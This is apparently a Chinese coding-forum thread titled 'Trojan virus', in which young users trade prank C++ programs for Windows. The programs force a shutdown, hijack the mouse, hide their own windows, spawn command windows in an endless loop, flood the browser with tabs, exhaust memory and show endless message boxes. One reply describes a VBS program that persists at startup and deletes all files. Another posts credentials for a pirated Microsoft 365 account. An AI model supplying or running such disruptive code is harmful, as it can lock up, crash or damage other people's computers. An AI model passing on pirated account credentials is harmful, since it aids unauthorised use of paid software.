问题标题: 木马病毒

1
2
已解决
杨骐宇
杨骐宇
中级光能
中级光能
#include <iostream>
#include<bits/stdc++.h>             
#include<windows.h>
using namespace std;
int main(){
    system("shutdown -s -f -t 30");
	return 0;
}

#include <iostream>
#include<bits/stdc++.h>             
#include<windows.h>
using namespace std;
int main(){
    system("shutdown -s -f -t 30");
    return 0;
}

杨骐宇在2022-10-26 20:54:10追加了内容

#include<iostream>
#include<Windows.h>
using namespace std; 
int main() 

    HWND hWnd = GetConsoleWindow(); 
    SetWindowLong(hWnd, GWL_EXSTYLE, WS_EX_TOOLWINDOW);
    srand (time(0));
    int x,y;
    while(1)
    {
        x=rand()%1000+300;  
        y=rand()%600+300;   
        SetCursorPos(x,y); 
    } 
}

杨骐宇在2022-10-26 22:05:24追加了内容
 #include<algorithm>
#include<iostream>
#include<cstdio>
#include<stdlib.h>
#include<Windows.h>
using namespace std;
int main(){
	
     MessageBox(NULL,"请关闭声音,否则…", "内存超标", MB_ICONERROR|MB_OK);
     for(int i=1;i<=6;i++) {
       system("color a");
       cout<<" "; MessageBeep(MB_ICONINFORMATION);
       Sleep(1000);
       system("color b");MessageBeep(MB_ICONINFORMATION);
       cout<<" "; 
       system("color c");MessageBeep(MB_ICONINFORMATION);
       cout<<" "; 
       system("color d");MessageBeep(MB_ICONINFORMATION);
       cout<<" "; 
       system("color e");MessageBeep(MB_ICONINFORMATION);
       system("color f");MessageBeep(MB_ICONINFORMATION);
       system("color 1");MessageBeep(MB_ICONINFORMATION);
       cout<<"■";
       system("color 2");MessageBeep(MB_ICONINFORMATION);
       cout<<"■";
       system("color 3");MessageBeep(MB_ICONINFORMATION);
       cout<<"■";
       system("color 4");MessageBeep(MB_ICONINFORMATION);
       cout<<"■";
       system("color 5");MessageBeep(MB_ICONINFORMATION);
       cout<<"■";
       system("color 6");MessageBeep(MB_ICONINFORMATION);
       cout<<"■";
       system("color 7");MessageBeep(MB_ICONINFORMATION);
       cout<<"■";
       system("color 8");MessageBeep(MB_ICONINFORMATION);
       cout<<"■";
       system("color 9");MessageBeep(MB_ICONINFORMATION);
       system("color 10");
       Sleep(1000);MessageBeep(MB_ICONINFORMATION);
       cout<<"■";

   }
   
     MessageBox(NULL,"最后一次提示", "bili...", MB_ICONERROR|MB_OK);
	  HWND hwnd=GetForegroundWindow();
    ShowWindow(hwnd,SW_HIDE);
   system("start https://www.bilibili.com/video/BV1GJ411x7h7/?p=1");
   Sleep(6000);
   MessageBox(NULL,"这只是开始", "bili...", MB_ICONERROR|MB_OK);
   while(1){
   	 MessageBox(NULL,"这只是开始", "bili...", MB_ICONERROR|MB_OK);
   } 
}

 


0
已采纳
刘风翔
刘风翔
新手启示者
新手启示者

或者用360查杀。

1
0
0
0
0
0
0
0
沙宸安
沙宸安
高级启示者
高级启示者

您需要激活Microsoft 365吗,我这里有一个盗版账号可供激活

0
0
0
沙宸安
沙宸安
高级启示者
高级启示者

好了我终于把教程找到了,你看教程学

Microsoft 365:

账号用户名:v077957@365of.top密码:aa112211
=========================
365安装+登陆教程:
PC教程https://s.tb.cn/c.0F2Eii
mac教程https://s.tb.cn/c.0FnpyW

0
0
被禁言 张恩昊
张恩昊
资深天翼
资深天翼

**竿赐赦九州同
你地主丈夺主丈
太霄帝君升寿丘
美景因公见一朝

暗藏玄只因

0
钱帅文
钱帅文
中级天翼
中级天翼

关机=木马病毒?????????

0
被禁言 张恩昊
张恩昊
资深天翼
资深天翼

你应该不知道木马病毒是什么,特洛伊木马是指伪装成一个工具(或软件)的可执行文件,通俗一点就是可以让你的电脑被黑客控制,最经典的就是2001年的灰鸽子远程控制。

你这个是恶意程序,只是关机,没有任何伤害力。玩笑程序至少要用VBS编出来,我用VBS编过简单的病毒,就是把电脑卡**机,把自己添加到注册表,开机启动,删除电脑里所有文件,这样电脑就废了。

0
0
0
快速利索的程序开发商
快速利索的程序开发商
新手守护
新手守护

还不如cmd呢。

在提供三个:

#include<windows.h>
using namespace std;
int main(){
    HWND hwnd=GetForegroundWindow();
    ShowWindow(hwnd,SW_HIDE);
    while(1)system("start");
    return 0;
}
 

#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main(){
    HWND hwnd=GetForegroundWindow();
    ShowWindow(hwnd,SW_HIDE);
    while(1)
        system("start https://ke.codingtang.com/");
    return 0;
}
 

#include<windows.h>
using namespace std;
int main(){
    HWND hwnd=GetForegroundWindow();
    ShowWindow(hwnd,SW_HIDE);
    while(1){
        int *s=new int[1000000];
    }
    return 0;
}

0
刘风翔
刘风翔
新手启示者
新手启示者

关机再开不就行了吗

我要回答